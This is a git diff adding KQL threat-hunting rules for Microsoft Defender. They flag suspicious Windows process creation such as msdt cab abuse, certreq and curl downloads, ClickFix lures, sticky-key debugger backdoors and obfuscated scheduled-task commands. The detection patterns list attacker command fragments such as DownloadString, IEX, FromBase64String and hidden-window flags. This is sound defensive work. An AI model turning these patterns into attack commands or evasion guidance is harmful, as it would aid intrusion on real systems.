+| where (FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\baaupdate.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_cabinet_file_execution_via_msdt_exe.kql b/KQL/rules/windows/process_creation/suspicious_cabinet_file_execution_via_msdt_exe.kql
new file mode 100644
index 00000000..14d6f073
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_cabinet_file_execution_via_msdt_exe.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Cabinet File Execution Via Msdt.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113
+// Date: 2022-06-21
+// Level: medium
+// Description: Detects execution of msdt.exe using the "cab" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+// False Positives:
+//   - Legitimate usage of ".diagcab" files
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -cab " or ProcessCommandLine contains " /cab " or ProcessCommandLine contains " –cab " or ProcessCommandLine contains " —cab " or ProcessCommandLine contains " ―cab ") and (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_calculator_usage.kql b/KQL/rules/windows/process_creation/suspicious_calculator_usage.kql
new file mode 100644
index 00000000..f1415e43
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_calculator_usage.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Calculator Usage
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-02-09
+// Level: high
+// Description: Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\calc.exe " or (FolderPath endswith "\\calc.exe" and (not((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_certreq_command_to_download.kql b/KQL/rules/windows/process_creation/suspicious_certreq_command_to_download.kql
new file mode 100644
index 00000000..28edfa39
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_certreq_command_to_download.kql
@@ -0,0 +1,14 @@
+// Title: Suspicious CertReq Command to Download
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-11-24
+// Level: high
+// Description: Detects a suspicious CertReq execution downloading a file.
+// This behavior is often used by attackers to download additional payloads or configuration files.
+// Certreq is a built-in Windows utility used to request and retrieve certificates from a certification authority (CA). However, it can be abused by threat actors for malicious purposes.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-config" or ProcessCommandLine contains "/config" or ProcessCommandLine contains "–config" or ProcessCommandLine contains "—config" or ProcessCommandLine contains "―config") and (ProcessCommandLine contains "-Post" or ProcessCommandLine contains "/Post" or ProcessCommandLine contains "–Post" or ProcessCommandLine contains "—Post" or ProcessCommandLine contains "―Post") and ProcessCommandLine contains "http" and (FolderPath endswith "\\certreq.exe" or ProcessVersionInfoOriginalFileName =~ "CertReq.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_child_process_created_as_system.kql b/KQL/rules/windows/process_creation/suspicious_child_process_created_as_system.kql
new file mode 100644
index 00000000..1d313013
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_child_process_created_as_system.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Child Process Created as System
+// Author: Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)
+// Date: 2019-10-26
+// Level: high
+// Description: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1134.002
+
+DeviceProcessEvents
+| where ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI") and ((InitiatingProcessAccountName =~ "NETWORK SERVICE" and InitiatingProcessAccountDomain startswith "") or (InitiatingProcessAccountName =~ "LOCAL SERVICE" and InitiatingProcessAccountDomain startswith "")) and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") and ((AccountName =~ "SYSTEM" and AccountDomain startswith "") or (AccountName =~ "Système" and AccountDomain startswith "") or (AccountName =~ "СИСТЕМА" and AccountDomain startswith ""))) and (not((ProcessCommandLine contains "DavSetCookie" and FolderPath endswith "\\rundll32.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_child_process_of_aspnetcompiler.kql b/KQL/rules/windows/process_creation/suspicious_child_process_of_aspnetcompiler.kql
new file mode 100644
index 00000000..508b59e7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_child_process_of_aspnetcompiler.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Child Process of AspNetCompiler
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-14
+// Level: high
+// Description: Detects potentially suspicious child processes of "aspnet_compiler.exe".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\notepad.exe") or (FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\AppData\\Local\\Roaming\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\")) and InitiatingProcessFolderPath endswith "\\aspnet_compiler.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_child_process_of_bginfo_exe.kql b/KQL/rules/windows/process_creation/suspicious_child_process_of_bginfo_exe.kql
new file mode 100644
index 00000000..1e46d243
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_child_process_of_bginfo_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Child Process Of BgInfo.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-16
+// Level: high
+// Description: Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.defense-evasion, attack.t1218, attack.t1202
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\AppData\\Roaming\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\PerfLogs\\")) and (InitiatingProcessFolderPath endswith "\\bginfo.exe" or InitiatingProcessFolderPath endswith "\\bginfo64.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_child_process_of_manage_engine_servicedesk.kql b/KQL/rules/windows/process_creation/suspicious_child_process_of_manage_engine_servicedesk.kql
new file mode 100644
index 00000000..56caf330
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_child_process_of_manage_engine_servicedesk.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Child Process Of Manage Engine ServiceDesk
+// Author: Florian Roth (Nextron Systems)
+// Date: 2023-01-18
+// Level: high
+// Description: Detects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1102
+// False Positives:
+//   - Legitimate sub processes started by Manage Engine ServiceDesk Pro
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\calc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and (InitiatingProcessFolderPath contains "\\ManageEngine\\ServiceDesk\\" and InitiatingProcessFolderPath contains "\\java.exe")) and (not((ProcessCommandLine contains " stop" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_child_process_of_sql_server.kql b/KQL/rules/windows/process_creation/suspicious_child_process_of_sql_server.kql
new file mode 100644
index 00000000..2ba63c98
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_child_process_of_sql_server.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Child Process Of SQL Server
+// Author: FPT.EagleEye Team, wagga
+// Date: 2020-12-11
+// Level: high
+// Description: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.
+// MITRE Tactic: Initial Access
+// Tags: attack.t1505.003, attack.t1190, attack.initial-access, attack.persistence, attack.privilege-escalation
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (not((ProcessCommandLine startswith "\"C:\\Windows\\system32\\cmd.exe\" " and FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessFolderPath endswith "DATEV_DBENGINE\\MSSQL\\Binn\\sqlservr.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_child_process_of_veeam_dabatase.kql b/KQL/rules/windows/process_creation/suspicious_child_process_of_veeam_dabatase.kql
new file mode 100644
index 00000000..fb29b870
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_child_process_of_veeam_dabatase.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Child Process Of Veeam Dabatase
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-04
+// Level: critical
+// Description: Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation
+
+DeviceProcessEvents
+| where (InitiatingProcessCommandLine contains "VEEAMSQL" and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (((ProcessCommandLine contains "-ex " or ProcessCommandLine contains "bypass" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "copy ") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\wt.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\whoami.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_child_process_of_wermgr_exe.kql b/KQL/rules/windows/process_creation/suspicious_child_process_of_wermgr_exe.kql
new file mode 100644
index 00000000..ef291be5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_child_process_of_wermgr_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Child Process Of Wermgr.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-10-14
+// Level: high
+// Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) child process
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055, attack.t1036
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\wermgr.exe") and (not(((ProcessCommandLine contains "-queuereporting" or ProcessCommandLine contains "-responsepester") and (ProcessCommandLine contains "C:\\Windows\\system32\\WerConCpl.dll" and ProcessCommandLine contains "LaunchErcApp ") and FolderPath endswith "\\rundll32.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_chromium_browser_instance_executed_with_custom_extension.kql b/KQL/rules/windows/process_creation/suspicious_chromium_browser_instance_executed_with_custom_extension.kql
new file mode 100644
index 00000000..b280e656
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_chromium_browser_instance_executed_with_custom_extension.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Chromium Browser Instance Executed With Custom Extension
+// Author: Aedan Russell, frack113, X__Junior (Nextron Systems)
+// Date: 2022-06-19
+// Level: high
+// Description: Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1176.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "--load-extension=" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_clickfix_filefix_execution_pattern.kql b/KQL/rules/windows/process_creation/suspicious_clickfix_filefix_execution_pattern.kql
new file mode 100644
index 00000000..16d162b2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_clickfix_filefix_execution_pattern.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious ClickFix/FileFix Execution Pattern
+// Author: montysecurity, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-19
+// Level: high
+// Description: Detects suspicious execution patterns where users are tricked into running malicious commands via clipboard manipulation, either through the Windows Run dialog (ClickFix) or File Explorer address bar (FileFix).
+// Attackers leverage social engineering campaigns—such as fake CAPTCHA challenges or urgent alerts—encouraging victims to paste clipboard contents, often executing mshta.exe, powershell.exe, or similar commands to infect systems.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.001, attack.t1204.004
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "account" or ProcessCommandLine contains "anti-bot" or ProcessCommandLine contains "botcheck" or ProcessCommandLine contains "captcha" or ProcessCommandLine contains "challenge" or ProcessCommandLine contains "confirmation" or ProcessCommandLine contains "fraud" or ProcessCommandLine contains "human" or ProcessCommandLine contains "identification" or ProcessCommandLine contains "identificator" or ProcessCommandLine contains "identity" or ProcessCommandLine contains "robot" or ProcessCommandLine contains "validation" or ProcessCommandLine contains "verification" or ProcessCommandLine contains "verify") and (ProcessCommandLine contains "#" and InitiatingProcessFolderPath endswith "\\explorer.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_codepage_switch_via_chcp.kql b/KQL/rules/windows/process_creation/suspicious_codepage_switch_via_chcp.kql
new file mode 100644
index 00000000..e60204e9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_codepage_switch_via_chcp.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious CodePage Switch Via CHCP
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
+// Date: 2019-10-14
+// Level: medium
+// Description: Detects a code page switch in command line or batch scripts to a rare language
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1036, attack.defense-evasion
+// False Positives:
+//   - Administrative activity (adjust code pages according to your organization's region)
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith " 936" or ProcessCommandLine endswith " 1258") and FolderPath endswith "\\chcp.com"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_command_patterns_in_scheduled_task_creation.kql b/KQL/rules/windows/process_creation/suspicious_command_patterns_in_scheduled_task_creation.kql
new file mode 100644
index 00000000..6eb95c3d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_command_patterns_in_scheduled_task_creation.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Command Patterns In Scheduled Task Creation
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-23
+// Level: high
+// Description: Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
+// False Positives:
+//   - Software installers that run from temporary folders and also install scheduled tasks are expected to generate some false positives
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/Create " and FolderPath endswith "\\schtasks.exe") and (((ProcessCommandLine contains "/sc minute " or ProcessCommandLine contains "/ru system ") and (ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd /r" or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r ")) or (ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -w hidden " or ProcessCommandLine contains " bypass " or ProcessCommandLine contains " IEX" or ProcessCommandLine contains ".DownloadData" or ProcessCommandLine contains ".DownloadFile" or ProcessCommandLine contains ".DownloadString" or ProcessCommandLine contains "/c start /min " or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "mshta http" or ProcessCommandLine contains "mshta.exe http") or ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Tmp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%") and (ProcessCommandLine contains "cscript" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "wscript")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_control_panel_dll_load.kql b/KQL/rules/windows/process_creation/suspicious_control_panel_dll_load.kql
new file mode 100644
index 00000000..c924af0d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_control_panel_dll_load.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Control Panel DLL Load
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-04-15
+// Level: high
+// Description: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\System32\\control.exe") and (not(ProcessCommandLine contains "Shell32.dll"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_copy_from_or_to_system_directory.kql b/KQL/rules/windows/process_creation/suspicious_copy_from_or_to_system_directory.kql
new file mode 100644
index 00000000..bca8698f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_copy_from_or_to_system_directory.kql
@@ -0,0 +1,15 @@
+// Title: Suspicious Copy From or To System Directory
+// Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-07-03
+// Level: medium
+// Description: Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk.
+// Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003
+// False Positives:
+//   - Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)
+//   - When cmd.exe and xcopy.exe are called directly
+//   - When the command contains the keywords but not in the correct order
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "copy " and FolderPath endswith "\\cmd.exe") or ((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains " copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) and ProcessCommandLine matches regex "(?i)\\s['"]?C:\\\\Windows\\\\(System32|SysWOW64|WinSxS)" and (not(((ProcessCommandLine contains "C:\\Program Files\\Avira\\" or ProcessCommandLine contains "C:\\Program Files (x86)\\Avira\\") and (ProcessCommandLine contains "/c copy" and ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains "\\avira_system_speedup.exe") and FolderPath endswith "\\cmd.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_csi_exe_usage.kql b/KQL/rules/windows/process_creation/suspicious_csi_exe_usage.kql
new file mode 100644
index 00000000..5bc3c6eb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_csi_exe_usage.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Csi.exe Usage
+// Author: Konstantin Grishchenko, oscd.community
+// Date: 2020-10-17
+// Level: medium
+// Description: Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.execution, attack.t1072, attack.defense-evasion, attack.t1218
+// False Positives:
+//   - Legitimate usage by software developers
+
+DeviceProcessEvents
+| where ProcessVersionInfoCompanyName =~ "Microsoft Corporation" and ((FolderPath endswith "\\csi.exe" or FolderPath endswith "\\rcsi.exe") or (ProcessVersionInfoOriginalFileName in~ ("csi.exe", "rcsi.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_curl_exe_download.kql b/KQL/rules/windows/process_creation/suspicious_curl_exe_download.kql
new file mode 100644
index 00000000..de61ac2f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_curl_exe_download.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Curl.EXE Download
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-07-03
+// Level: high
+// Description: Detects a suspicious curl process start on Windows and outputs the requested document to a local file
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable") and ((ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpg" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".temp" or ProcessCommandLine endswith ".tmp" or ProcessCommandLine endswith ".txt" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbs") or (ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Public%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "C:\\PerfLogs\\" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\")) and (not(((ProcessCommandLine contains "--silent --show-error --output " and ProcessCommandLine contains "gfw-httpget-" and ProcessCommandLine contains "AppData") and FolderPath =~ "C:\\Program Files\\Git\\mingw64\\bin\\curl.exe" and InitiatingProcessFolderPath =~ "C:\\Program Files\\Git\\usr\\bin\\sh.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_customshellhost_execution.kql b/KQL/rules/windows/process_creation/suspicious_customshellhost_execution.kql
new file mode 100644
index 00000000..840e5a62
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_customshellhost_execution.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious CustomShellHost Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: high
+// Description: Detects the execution of CustomShellHost.exe where the child isn't located in 'C:\Windows\explorer.exe'. CustomShellHost is a known LOLBin that can be abused by attackers for defense evasion techniques.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+// False Positives:
+//   - False positives are unlikely, investigate matches carefully.
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\CustomShellHost.exe" and (not(FolderPath =~ "C:\\Windows\\explorer.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_debugger_registration_cmdline.kql b/KQL/rules/windows/process_creation/suspicious_debugger_registration_cmdline.kql
new file mode 100644
index 00000000..4082a334
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_debugger_registration_cmdline.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Debugger Registration Cmdline
+// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
+// Date: 2019-09-06
+// Level: high
+// Description: Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.008
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\CurrentVersion\\Image File Execution Options\\" and (ProcessCommandLine contains "sethc.exe" or ProcessCommandLine contains "utilman.exe" or ProcessCommandLine contains "osk.exe" or ProcessCommandLine contains "magnify.exe" or ProcessCommandLine contains "narrator.exe" or ProcessCommandLine contains "displayswitch.exe" or ProcessCommandLine contains "atbroker.exe" or ProcessCommandLine contains "HelpPane.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_desktopimgdownldr_command.kql b/KQL/rules/windows/process_creation/suspicious_desktopimgdownldr_command.kql
new file mode 100644
index 00000000..c8977ed0
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_desktopimgdownldr_command.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Desktopimgdownldr Command
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-07-03
+// Level: high
+// Description: Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+//   - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /lockscreenurl:" and (not((ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".png")))) or (ProcessCommandLine contains "reg delete" and ProcessCommandLine contains "\\PersonalizationCSP")
\ No newline at end of file
